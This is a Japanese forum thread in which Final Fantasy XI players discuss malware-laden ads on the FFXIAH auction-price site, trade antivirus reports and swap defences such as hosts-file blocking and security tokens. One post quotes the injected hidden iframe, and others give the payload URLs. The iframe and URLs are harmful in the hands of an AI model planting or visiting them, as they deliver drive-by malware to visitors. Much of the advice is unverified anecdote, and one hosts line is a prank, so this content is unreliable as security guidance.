FFXIAHにスパイウェア！

FFXIAHにスパイウェア広告が載ってます。
開くと感染するので注意してね！

ちょっと確認してくる

ゲハでやれ

FFAHには定期的にこういうの仕掛けられてンよ？
しらなかったのかよｗ
まだアカハクされてなくてFFAHみてたやつは
即刻OS再インストールしとけ。
再インストール後、パスワード変更（PS2あればPS2でインして変更してもよし）

URLも貼らずにスレ立てとは

なにそれこわい

javaは全て弾いてる俺に隙は無い

ソースネクストのとか役に立たない？（笑）

ふぁいあほっくすでのーすくりぷといれたらしあわせ

ＦＦＡＨのサイトを開く時間があるのなら、普通にＦＦＸＩにインするわなｗ

ツールの話になるけどInfoBarJPは便利
何かの素材を手に入れたとき値段が分からないときにダブルクリッコするとFFXIAHで値段が検索される
これで売れ筋素材と捨ててもいい素材がわかりやすくなったぜ

>>8
ジョークソフトだらけのソースネクストとか有り得んｗｗｗｗ

トークン使っててもアカハク喰らう？

くらわないためのトークン

食らうかもしれないからパス定期的に変えたほうがいいのかな。
俺ｐｃ詳しくないからトークンあっても過信できないｗ

大抵の人はパスPCに保存してあると思うからそれだけだと確実に垢泊される
スクエニ垢導入するだけでPASSが2重になり、トークンで3重になる
トークン無くしたら終わりだけど

どの広告だよ
口臭いとかいうやつ？

>>16
いやローカルに保存されてるのがPOLとスクエニ垢のパスだから
ハックされれば両方いっぺんに抜かれるわけで、2重にはなってないだろう
トークン導入して初めて2重といえる、3重にしたかったら指紋認証とか

スクエアエニックスアカウントのパスワードって保存できたか？

できないか・・・悪かった

13だけどAH見て暫くしてから処理が重くなって、再起動も凄い時間かかったんだわ
その後はスムーズで何ともないんだけど若干不安

特ｱ連中もFF以外を狙ってくるようになるかもしれんから、
トークンあっても対策はしとくべきだとは思うけどね。
一時期FFFTPのパスぬいてサイトを改竄、そのサイトをアクセスすると
さらにウィルス感染という極悪なウィルスがあったが、
同じことやってパス抜きされたらFF関連サイトすらみてらんなくなる。

どの広告なんだよ！

広告なんてあったんだｗ　火狐でNoScript入れてるから何にも表示されないｗｗ

やだこわい

フレの夫婦がアカハックされた時、FFXIAHのスパイウェアが原因だったようだと言ってたな。
ウィルス対策ソフトは勿論、PG2も入れてたし、火狐でNoScriptも入れてる人
やられるときはやられる。

まだＦＦやってるのかｗ
２垢で常時競売所に置いとけよｗ
１ギル落札とかメインでやるとウダウダ引きずるし
寝バザーも合成の素材売り買いも身元バラさないために(バレると吊り上げ下げする糞がいる)
本気でやるなら最低２垢でやるべき

垢ハック騒ぎ以降あのサイトは見なくなった

>>1はＦＦＸＩＡＨに裁判を起こされたら負けると思う
営業妨害による損害賠償請求されるよ

>>18
スクエニ垢のパスって保存されたっけ

>>26
スクリプトを弾いてるのにどうやってウィルスをブチ込んだんだろうな…ｗ

右の縦長の広告あたりに埋め込まれているらしいttp://loan-5.sakura.ne.jp/css/1.swfってやつにノートンが反応したｗ

FFXI-AH開いたら、トロイの木馬検知したぞｗｗｗｗ
やばすｗｗｗｗ

Chrome最強だな

俺もFFXI-AH開いた瞬間トロイの木馬検知したｗ

今日朝Sleipnir開いた時ノートンが何か検出したんだよな。
FFAH、昨日みたし心配だ…。

>>36
さあ今すぐPCをフルスキャンする作業に戻るんだ
もちろんネットは切っておけよ？

AH開いただけで攻撃食らったナニコレｗｗｗ

セキュリティートクーンを導入しててよかったわ
中華に俺のf8たん奪われたら3年は立ち直れないよ

垢ハックされたらスッパリやめれるわ
踏んでみるか

NAも騒ぎそうなもんだが、そっちらへんはどうなんだろ？

昨日はカスペルスキー何もいってこなかったけど今朝からの話？
とりあえずやれる対処はしておく…

FFAH開いたけど、反応なし@Anti-vir

FFAHのトロイってPOLトップのパス保存だけじゃなく、リンクシェルコミュニティの
ログインのとこのパスも狙ってきたはず。

確か何年か前、七夕イベントのときにそれで騒ぎになった記憶がある。

俺も今日の朝FFAH開いたんだが、何か開いた瞬間物凄く重くなって
ジージー音鳴ってからコンピューターがシャットダウンしますどーたらいってシャットダウンされた

NIS2009では一切反応しないな

>>44
普通に考えたらそっちも標的にしてくるよな

もう使ってないけどLSコミュニティってPOLIDとパス要求してくるとか
頭おかしいんじゃないかと思った

>>46
ノートンは前からそういったスパイウェアには一切反応しなかったぞｗ

>>48
NANDATTEEEEEE!!!

むしろアトラスの方が

で、感染したらどこのフォルダがやられる？
プログラムファイルフォルダとWINDOWSフォルダ
スキャンすればいい？

aguseにかけて見たが何も検出されず

トークン導入しろよ

俺の見てる FFXIAH には、広告なんて表示されてないんだが・・・？

ノートンで検出名がBloodhoundだから
他のアンチウィルスソフトではまだ検出されないかも

Bloodhoundってのはまだウィルスと確定した訳じゃないけど
怪しい動作してたからとりあえず遮断してこれから鑑定してみるわ、って
シマンテック独自の動作らしいよ

今マジでFFAHに接続するだけでヤバイから接続も止めた方がいい

つfirefox＋noscript

>>56
お前だけじゃね？

MACでみたらブラウザソフトのSafariがいきなり強制終了ｗ
以前、騒がれたときと同じ症状なので、おそらく何かしらのウィルスがあるね

>>57＋Adblock Plus

トークン使用の俺に隙はなかった

ここまで読み飛ばした

FFAHのウイルスなんて昔からだろｗｗｗｗ
なんで今更騒いでんだよｗｗｗｗ

業者沸いてるな

うちの鯖、本日最も検索されたアイテム
「真龍の免罪符：両脚」

業者か

>>61
FFのアカウントハックをされないだけで他の個人情報とかがダダ漏れになっている可能性はないだろうな?

>>59
他のブラウザでも見れないな

C:\WINDOWS\system32\drivers\etcにあるhostsに
0.0.0.0 ads.ffxiah.com
一文追加でおｋ

この現象って今日からなのかな？
何時頃からなのかわかる方います？？

どの現象よ？

>67ってどういう意味？

>>68
昨日からかな
俺もノートンが反応してたし
PS2ユーザーだから気にしてないけど
スレたってたから見に来た

そういや最近FFXIAH開くとレイアウトが崩れてることがあったんだがアレもこの一環かね
FirefoxのNSで基本的にスクリプトはじいてるから特に問題は起こってないが

>>56
あぁ俺も正にソレだ
遮断された。

いまのとこ影響は無い
といってもPS2ユーザーだが

まちがえた>>55だった

ＦＦＡＨに接続してみたがオレは何も問題が起こってない。

やばい報告をあげてるのはどこがやばいってのをきちんとあげてくれ。
エラーが出てるならＳＳ出すなりしてくれねえと対応できん。

>>75のPCはエラーさえ出なければ何の問題もないらしい
感染したときに「僕はこのPCに感染しましたよ＾＾」と教えてくれるスパイウェアはあまり無いからな

やっぱりそうだったのかｗｗｗｗｗｗ
昼頃に接続したらAntivir先生がいきなりオオイカリしてピロピロ警告鳴らしてたから何かと思ったら
怖い怖い

>>67

ttp://www.google.co.jp/m/search?ie=Shift_JIS&ct=fsh&q=hosts+0.0.0.0

広告はhostファイルで弾いてるから問題なし
火狐にNo ScriptとAd Block Plusも入れてある

ads.ffxiah.comってもうなくねーか？

今日トロイ踏んでしまった俺ポップ
もうむやみに踏まない

あの広告スレとＡＨ…ｺﾞｸﾘ

>>41
あっちは匿名じゃないからデマの流しようがない。

画面右上に今まで見た事ないような手書きみたいなバナーあるが
それ踏んだらヤバいって事？

と思って更新掛けたらいきなりノートンさんがなんかを遮断した件

つか、FF11入ってるPCで海外サイト踏むなよw

>>84
いやFFAH開いた時点でアウトって事だぞ
広告が表示されたら感染

火狐とかで広告ブロックしてれば平気だけど

sakura.ne.jpってのがくせぇ

http://loan-5■sakura■ne■jp/css/goole_service■js

匂うｗ

ちょ・・・>>84やばくないか

あやしいバナー＜俺を見たら危ないじゃなくて、既に危ない状態は完了してるんだよ！

最新のフォーラム書き込み (view more)が消えてるぞ！
どういうことだ！


見たことないけど。

うむこのサイト開いただけでアウトみたい
ノートンで遮断されてたけど
感染は全部チェックかけたけど特に無かった

ただ詳しくないので安全とは言い切れない

キャッシュとか一時ファイルいろいろ消した（ｷﾘｯ

隠す気満々
<iframe width='100' height='0' src='http://loan-5■sakura■ne■jp/css/flash■htm'></iframe>

とりあえず、感染したら
どこのフォルダのどのファイルに書き換えられた跡があるか
おしえて〜＞＜

開くなっつってんだろ

これはマジでシャレにならんレベル

ヴァナ門もそうだったろｗ

Flashを落として入れるような記述があった
アホなのでそれ以上わかりません

やべぇ、火狐いれずに最近AHみたぞ…
だれか感染後の症状と変更点を頼む…

　　　　＿＿＿
　　 ,;f　　　　　ヽ
　　i:　　 　　 　　 i
　　|　　　 　　　 　|
　　|　　　　　　　　|　　///;ﾄ,
　　|　　　　^　　^　)　////ﾞlﾞl;
　　(.　　>ﾉ(､_, )ヽ､} l 　 .i .! |
　 ,,∧ヽ　!-=ﾆ=- | │　 　| .|
／＼..＼＼｀ﾆﾆ´ !,　{　　 .ﾉ.ﾉ
／　 ＼ ＼￣￣￣../　　 / .|

お前のＰＣが妊娠する

ヴぁなもん、xrea系のFFサイトは過去に結構やられてんね

アカハクスレのまとめサイトあるじゃないか
http://ff11.my-sv.net/

＼(^o^)／
ttp://up2.viploader.net/pic3/src/vl2_173969.png

こんあ事前から散々言われてたじゃねーかｗ

”無視”選んでみる

プニルの履歴見たが最後に閉じたのは先週だったが…怖いなぁ

いつものことじゃん
ノーガードでネット見てるほうがクソ

>>104
これこれ
これが出た

>>104
は何？

ディレクトリ覗くと昨日の午前に更新されたファイル全てが怪しい感じだなー
他が08年から一切更新されて無いしこりゃ放置サイトを乗っ取られた感じかもな

　　　　＿＿＿
　　 ,;f　　　　　ヽ
　　i:　　 　　 　　 i
　　|　　　 　　　 　|
　　|　　　　　　　　|　　///;ﾄ,
　　|　　　　^　　^　)　////ﾞlﾞl;
　　(.　　>ﾉ(､_, )ヽ､} l 　 .i .! |
　 ,,∧ヽ　!-=ﾆ=- | │　 　| .|
／＼..＼＼｀ﾆﾆ´ !,　{　　 .ﾉ.ﾉ
／　 ＼ ＼￣￣￣../　　 / .|

すまん、PCで104確認してみた、Antivirの警告画面か…

おまえらなんのためのトークンなんだよｗ
99.9％以上導入していればハックされる心配はないし
万が一されても永久的に導入してあれば補償されるのだしｗ

導入してないといっかいこっきりだが

補償されるから犯罪者を太らせてもいいなんて事はない

>>115
そらそうよ。
ただ、思った以上にトークン買ってない人が居て驚いただけだ。

トークンが蔓延する前の最後の悪あがきなんだから察してやれよ

まだやってるぐらいならトークン買えよ
980円で倉庫オンライン緩和＝時間短縮なのに

前からノートン騒いでたよ

この前「オーグメントまとめ」でググッたサイトもほとんどやられてたな

おおこわいこわい　見なくてよかった

これ感染するのflashプレイヤーが古い奴だけじゃね？

外人が必死に

（キャラ名）の垢がハックされた！
アイテムが盗まれてる！対処してくれ！

ってシャウトしていた原因はこれか？

騒いでるのはトークン買って即解除してる厨だろ

Exploit-SWF→SWFの脆弱性をつく
つまりこれに感染するのは
flashプレイヤーのバージョンが古い奴

FFのアカウントだけで済めばいいけどｗ
トークン買ったからって安心してる奴も大概だな

>>125
何が「つまり」だって？
最新版のflashプレイヤーに発見された最新の脆弱性をつく最新のスパイウェアだって存在するんだが？

えっなにこれトークン使っててもだめなん？

>>127
いたちごっこだからこそ、脆弱性に対応した最新版をたえず最速に導入する心構えが必要

日頃から心がけているとFlashに留まらず
他のアップデートも頻繁に行い、ブラウズも侵されないように気をつけるようになってくる
100％ではないけど被害にあい辛くなるのは事実

>>128
トークンは破られないからハックされる心配はほとんどないが
2重のセキュリティのうち1枚は突破されてしまうわけで
それをやばいと感じるか、ハックさえされなければどうでもいいと感じるかは人次第
パス抜かれるってことは、PCに入ってる全ての情報を見られてるって意味とほぼ同じだしな

>126
いいたいことはわかるが、それだとトークン持ってても垢ハックされるように見えるぞ

ffxiahの広告位ブロックしとけよｗ

ＩＥ使うなでＦＡ

>>129
そりゃそうだよな
ただAdobeやMSなんか、脆弱性に対する対応が糞遅いことで有名なのに
>>122>>125みたいな安易に最新版にしておけば安心みたいな短絡思考の奴が多いのは問題だろう
あまつさえ、今FFAHに仕込まれてるスパイウェアの種類すら解析されていないのに、「flashプレイヤーを更新すれば安全」
なんていういい加減な書き込みをされているんだから一応否定しておかないと鵜呑みにする被害者が発生しないとも限らないしな

セキュリティトークン買ってサッチェル開放したあと
トークン解除して垢ハク喰らった人っているんかな

>>133 みたいな人が被害に遭いやすい

そんな馬鹿いても恥ずかしくて報告できないと思う

昨日見ちまったもんだからカスペルスキーでスキャンしたけど
何も出てこなかったなぁ。
トークン使ってるから差し迫って困るということはないんだが、
何も検出されないってのは逆に不安だｗ
カスペルスキーでスキャンしたら何か出てきたって人はおらんかね？

>>134
>>104ででてんじゃん？
脆弱性としては
ttp://vbs.ahnlab.co.jp/APTR_Adobe_Flash_0DAY_20090723.pdf
こいつを利用するタイプだろうからアップデートしてないと喰らうんじゃね？といっただけなんだが
まあ100％安全ってわけでもないのは間違いないけど「flashプレイヤーを更新すれば安全」なんて言った覚えは無いよ
まあ気に障ったならすまんな

俺も普通に使いまくってるんだけど
Firefox3.5とKasperskyでは何も検出されないな

一応ffxiah.comの管理人もウイルス広告があったら削除はしている。
報告があってからの対応だから常に後手後手だけどな。

Google Chrome使ってるんだが、その場合の予防策として
ＡＨ開かない以外に設定で何いじってたらいい？

>>142
GC使うのをやめて狐火に乗り換える

avastは反応してないぞ

昨日ａｈ見た後で　TROJ_GENERIC　ってトロイを検出したので削除しました。
ａｈだと特定しているわけではないけど。

ｳﾍﾎｯ

将来、ホームレスになってやる空き缶拾いの予行演習として
競売買い店売りをしてるクラクライージスイナゴ内藤Wingsheart

ｆｆ１１やってるから見てしまう訳で
１１やめれば解決

ネットのセキュリティに解決なんてもんは無いから
ネットやめるしかないな

Macでみるにはどうしたらいいの？

だから見るなら携帯から見れよ

もうずっと１年以上も前からあそこはヤバイと言われてんのに
何の対策もほどこさんで呑気に見ている人が多すぎる

マジなら■は警告出したほうがいいだろ
有名なサイトなんだし

こういうことはノータッチだよ奴等
日本人が運営してたら潰してるかも知らんが

aguse.jpでは反応無しだな

ttp://www.aguse.jp/

昔から言われてたことだろ
あと広告はいつも一緒というわけじゃねーんじゃないか？
ころころ変わるからチェッカーでみてもウイルス入ってない広告だったら無反応だし。

とりあえず>>67の対策がお勧め。
トロイ仕掛けられてるのはFFXIAH本体じゃなくて、
ランダムに表示される広告の方だからな。

とりあえずこのスレのおかげでトークン購入を決意した。

ＡＨなんてスパイウェアの巣窟じゃないか・・・

火狐でNoScript入れてAH見るとバハムート鯖しか見れないんですが、他の鯖見る方法有ります？
日本語変換は出来るんですが、鯖変換ができなくて

ＡＨって何の略？アーハー？

>>160
アカウントハック

auction　houseでAHじゃねーの？

アメリカ人包茎の略だな

なるほど…

avastで一応windowsフォルダ検査したら感染なしだったけど、大丈夫かな？
感染してるとしたらどのフォルダがやばい？

カスペが反応しないんだがまだ仕掛けられたまま？

>>166
それはアウトｗ

先日トークン注文したけどいつくるの！
はやくきて〜はやくきて〜

（　＾ω＾）・・・

>>168
通販のケースだと一般的に5〜7日で届く、品薄だったり込み合ってる場合なんかは14日以上掛かる場合もあるけど基本的には稀

業者が佐川だと、永遠に届かない可能性もある

>>166
今は何もないんじゃね？
カスペとAntiVirで検知せず。

>>172
ローテーション

ノートンも反応ないな

>>170
12日に注文したから明日か明後日か！はやくきて〜はやくきて〜

>>171
いやらしい

カスペ使ってて反応全くなかったけど
心配だったので完全スキャンしたら感染してたわ・・カスペの人要チェックです
自鯖スレにも書いたんだが
「禁断の壺」「secuniaPSI」「GrayUtilities」の３つのソフトが感染してた
一度削除して入れ直そうとしたんだけど、
グレイは窓の杜からDLした最新版が最初から感染してて即削除処理されたぞ・・

追記　winXp sp3　炎狐＋NoScript＋AdblockPlus＋FlashBlock使ってて　PeerGuardian使ってても感染した

そして俺様のIDがXPのPG×なんてこったい

>>177
とりあえず何のウイルスに感染したんだ？
あとAHとなんか関係あるのか？

>>166
>>167

AH見て感染したのは間違いがないんだ、それ以外に危険なサイト等見ることがないので
ウィルスは完全スキャン中に駆除してしまったから名前まではもう分からない、すまん
今日はほぼ一日中PCのセキュリティ関連見直しで再起動しまくったり履歴削除とか色々やってしまって
ウィルス名確認は不可能になってしまった

>>180
そんないい加減なことやってるなら間違いないというのも疑わしい
危険なサイトかどうかなんてもんがわかってるなら誰も苦労しないし
そもそもソフトが感染するって状況がおかしい
だいたい履歴に残ってるだろうが

AHサイトを一度でも開いた人はPCチェックした方がいい、くらいのヤバさだと思う
自分はPS２専門＋トークン使用なのでFFXIへの影響は最小限になるだろうが
ゲームだけの問題にならない可能性あるから

自業自得だな
あれだけ騒がれたのに何でまだ見てるの

新しい金策でも発見してAH見られると困るのかｗ

携帯からでも同じアドレスで見れる？

>>184
今時FFにそんな必死な人いるの？ｗ

SWF経由で「禁断の壺」「secuniaPSI」「GrayUtilities」に感染したとか摩訶不思議だな
作者はどんなのをターゲットにしてるんだろう
単純に誤爆じゃないのって気がしますな
カスペにはよくあることだし

１１０★１６５★０★０／１６
をルーターのパケットフィルタールールに追加しておいた。

そいや最近、何も起動してないのに
パケットの送信受信ランプ？がつきっぱなし…
これヤバイかな？

パスワードが違うって言われてログインできなくなった…
スクエニに電話しても時間外で繋がらないし
もう解約してもいいんだけど、解約もログインしないとできなかったりするの？

>>190
そう

>>191
ぐあ、じゃあ明日の朝まで指を咥えてハックされ続けるしかないのか…

McAfeeでswfにトロイの木馬検知したわ
まあ削除できたけど

フリートライアル取得してそっちからGMコールすればよろし

昼間は広告表示されてなかったけど今は普通にいつものえっこれが口臭の原因？があるな

>>194
なるほど！
ありがとう、やってみる

その辺のアブリは元からスパイウェア入ってんじゃナイノ？

アーってなに

最近は、自動的に複数のURLに接続して、それぞれ異なる脆弱性をついてくるから
１つ防いでも実は別のに感染してたってことがあるから、気をつけてね。

なんかの祭の時FT一回使ってみようと試したけど
8時間立っても落ちて来なくて途中で辞めちゃったな

携帯からPCビューワー使ってFFAH見てるんだけど、数日前やたら重かった
丁度その頃仕掛けられたんかな？
例の広告が表示できんだの何だので見る迄に時間かかった気がした

>>176 ID:CpsgXpgx
>「禁断の壺」「secuniaPSI」「GrayUtilities」の３つのソフトが感染してた

とヒントを書いてあったから、窓の杜からグレイ落としてVirustotalにかけて見たよ。
Antiy-AVL 2.0.3.7 2009.08.18 Virus/Win32.Induc
DrWeb 5.0.0.12182 2009.08.18 Win32.Induc
F-Secure 8.0.14470.0 2009.08.18 Virus.Win32.Induc.a
Kaspersky 7.0.0.125 2009.08.18 Virus.Win32.Induc.a
結果は4/41　いまだにカスペはF-Secureとのダブルエンジンなのかい？　よく知らないけど…

まあ、なんというか、微妙に新種なのか、誤検知なのか・・・情報が少ないな

一昨日あたりAH見に行ったらすんごい重くて
その後ニコニコ動画見ようとしたら画面表示されなかったけど
同じような症状の奴居る？

ちなみにスレイプニル

>>67
0.0.0.0 dubai.2ch.net
ウイルスもらいました＞＜

>176
>202
エフセキュアブログ : 0wn1ng Delphi
ttp://blog.f-secure.jp/archives/50263100.html

同マルウェアは始めに、Delphiのバージョンが4から7までの間であるかどうかをチェックし、次に$DELPHI_DIR$\source\rtl\sys\SysConsts.pasを入れ替え、悪意あるコードを書き込む。その後に SysConsts.pasは削除される。

コンパイラ自体に仕込んでいる新種？の模様。FFAHをFx＋NoScript〜・・・とは関係なくもともとそのアプリケーション
作成時に感染させている様子。感染アプリケーション動作時にどのように動くか情報が不足しているが、「新種」認識で
動向を見守ったほうがよさそう。

>>202
カスペ2009では、某サイトのMDRMやRNRMでも同様の反応が出る「Virus.Win32.Induc.a」

なにこの集団Virus.Win32.Induc.a誤検知。

サイト開いてしまったんだけど
AVGで完全スキャンしても反応がない
トークン使ってるとはいえ、感染してると思うと不安だ･･･

Avast先生反応しないな・・・

カスペルスキーは「Virus.Win32.Induc.a」を検出する癖に、
どういうマルウェアなのか詳細を確認しようとしたらデータがなかった。
ちなみにFFXIユーザーじゃなくて「Gray Utilities」を使ってた口。

誤検知かな？と思ったけど、
スレ内にはFFXIにログイン出来なくなった人もいるみたいだし、
一応、新種としてカスペルスキーに報告メール入れてみる。

「Virus.Win32.Induc.a」を検索してみると、
2008年に確認されたようなサイトを見かけたから、
新種ではない気もするけど、それならデータがないっていうのもおかしな話だよな。

とはいえ、やっぱりフリーソフトの危険性が高いのは間違いないね。
不要ファイルやレジストリ削除は、また「DiscX Tools」の製品版でも買うことにするわ。

広告なんてなかった

昨日FFAHのトップページ開いたらトロイの木馬に感染した！削除できない！
ってノートン先生が警告してきたが低危険度でシステム的にほとんど問題ないとも言ってたぜ
とりあえずIEの全てのオフラインコンテンツ削除しといた
昨晩まではFFAH開くたびに感染警告出てたが今朝以降は何ともないぜ

さようならAH

209を書き込んだんだが、すまん、2008年は見間違いだった。
日付は思いっきり2009年8月18日だったわ。
>>205 の紹介してるのと同じだった。

一応ウィルス名が検出されるってことは、
カスペルスキーも存在は既に認識してるってことか。
感染してるファイルごと「Gray Utilities」はアンインストールしたんだが、
書き換えられたデータが残ってると厄介だなぁ。

>>211
潜伏されたな・・・ﾌﾋﾋ

>>174
ノートン先生はAHひらいた時に遮断してくれたぞ。

うちは、グレイは使ってないんだが、secuniaPSIを利用しているため

>176
>「禁断の壺」「secuniaPSI」「GrayUtilities」の３つのソフトが感染してた

我が家もSP3　Firefox3.5.2+NoScript+AdblockPlus+RequestPolicy　PeerGuardian利用中と、>176と
非常に環境が似通っているためこの件に関しては、動向が気になっています。

しかし、利用中の「secuniaPSI 1.5.0.0」は、exe自体と、保存してあるセットアップexeをVirustotalに投げてみたが
異常は発見されなかったため、>176　は少なくとも「GrayUtilities」→「secuniaPSI」への感染が発生していると
思われます。（窓の杜から落とした「GrayUtilitiesインストーラー」はVirustotalで反応した）

FFのために、利用PCの環境をガッチガチにして利便性を失っている部分があるのに我慢して使ってるところも
あるので、こういう情報は非常に【興味があります】【ありがとう】

>>216
なぜコテるんだ？

>>216
道具は良かったが使い人が駄目だった例みたいだな

トークン利用解除って他人は出来ないよな？
他の設定変更同様にワンタイムパス入れてから解除画面になると思ってるんだけど合ってる？
確認なしに解除になったら困るから試してないんだが
ハクられてトークン解除されたら終わりだよな、と不安になった

そういえば、このサイトのことで質問なんだけど
うちの鯖に太公望を何本も同一人物が出品してんのね
んで、名前をクリックしようとしても出品等の履歴がでないのさ
なんか、そういう設定みたいなもんがあんの？

たしかトークン解除にトークン使うから無理のはず

>>219
それで解除できたらトークンの意味無いだろｗ

プレイオンライン終了時に強制終了されたし
感染したのかなこれ・・

>>219
垢ハックスレにも上がっているがＰＯＬ起動画面を装った
業者ハックサイトに入力すると即業者にデータが送られる
それでログインされてトークン利用停止＆パス変更されたら終わり

ＰＣで起動する際はＰＯＬイン画面の他に何か起動してないか
もしくは開いてるＰＯＬ画面が正規のものか等をタスクマネージャで
しっかり調べてから入力するべきかもしれんな

まぁプログラム名やウィンドウ上部のタイトルまで
偽装されたら正直どうしようも無くなってしまうが･･･

>220
ユーザー登録すると履歴の非表示設定を選べるようになる。
転売、鯖間輸出入、競売買い店売りやってる連中はよく非表示になってる。

スクエアの今までのセキュリティ考えると
当たり前が当たり前じゃないからさ
何か抜けてるんじゃ無いかと不安になったわけ
実際試してみりゃ、すぐ分かるんだろうが
スクエアのポカで確認無しに即解除とか有っても不思議じゃないし
誰かやった事あればと思って聞いてみた
トークン導入者も増えてるだろうに今頃リンクシェルコミュの疑似サイトなんて話題が出て来てるから余計にね

読むと頭痛がするのは自分だけだろうか

夏休みか

PG2入れてて月曜にAH開いたら広告の所が
ページが見つかりませんになってたのは覚えてるけど、
これってPG2にブロックされてたんだろうか？

>>226
セキュリティ面で重大な問題って今まであったっけ？
ゲーム内の不具合とシステム周りは別問題だし。

ソースネクストのウィルスセキュリティゼロいれようとしたらぶっ壊れた

他にもNAサイトのアトラス(地図系サイト)も危険信号

強いてあげれば、LSサイトだっけ？なんかそんな機能のページで何かあったような。

ソースネクストのウィルスセキュリティZEROは文字通りセキュリティZEROになるから止めた方が良い
Avastでも入れてた方がまだマシだ

>>232
あそこはGoogle先生も危険だと認めてるからな

>>230
以前IDとパスを平文で保存してた事あったよな。
発覚してからもかなり放置して、垢ハクが話題になりだしてからようやく修正したはず。

あれは自分で蒔いてるのか広告で感染するのか分からんが
管理してる人は自分のサイトがウィルス会場なのは
気付いているのだろうか

カスペルスキーのデータベースに発見。
8月15日14時39分に検知･データベースに追加。
同日19時33分に対応した定義データベースをリリース。

ウイルスにやられた連中は英語版と日本語版どっちを見てたんだ？確か広告違うのが出るよなあれ。
日本語の方見てるが何も出ないので不安だ

だから広告消せよ

火狐を導入してNoScriptとAdblock plus使ってJavaと広告のフレームを消せばいい

vmwareの中に入っているOSにはセキュリティソフト入れてなくてFFXIAH見てたけど、
あれってホスト側にセキュリティソフト入れても感染する？
昨日、久しぶりにスキャンしたらトロイが混じってたわ

>>242
する

>>243
ホスト側の方にも感染する？

>>244
VMwareってことは、ネットワークブリッジしてるんだから
ネットワーク感染型のウィルスにはやられちゃうだろ

>>245
そうなのか・・・
やばいサイトでスクリプトを強制しないと見れないところあるから
仕方なく大抵vmwareのゲストOSのw2kのIEで見ていたけど
やっぱりそれが原因でホストの方にも感染していたとはなあ
あーあ、やばいサイトを見るのも面倒だな

垢ハックｺﾜﾋ:;

>>246
トロイに感染したのは、うっかり何かの拍子で開いちゃった可能性が高いと思うが

ゲイツOSのPCで怪しいところいっちゃだめよ

んだな
1台くらいLinuxPCあるとよい

工房の頃はBSDとLinuxも動かしてたけどアホらしくなってやめたな
当時はなんかかっこいいと思ってた

今時、Linuxくらい使えないと・・・
「Linuxも使えない男の人って＾＾；；」
ってスレ立てられちゃうぞｗｗｗ

>>251
自分もわざわざlinux入れて玄人気取りしてたけどまったく使わずに消したなｗ
友達にも自慢してた。

あれはあれで面白いんだけどな。
まぁ目的がないとただ入れて放置＞削除な流れにはなるのは確か。

BSDやLinuxがはやった当時は俺もその口だったさ。

一円ポケットPCで見てる俺に隙はにぃ

NOD32はどうなの？

age

>>224
ワンタイムパスが一回抜かれてもトークンは解除されない。
トークン解除にはトークンのシリアル・２回ワンタイムパスが必要。

鞄鯖にて祭り予定
決定事項

【日時】　8/23　日曜日　8時から移動
【場所】　三国から出発して、各国で宣伝。その後ジュノを目指す。
　　　　　　※バスは人いないから、サンド組とウィン組でもいいかもしれない。
【目的】　塵野郎の知名度を稼ぐ

とりあえずこんなところ。白門はいきたいけどいけなくて涙目。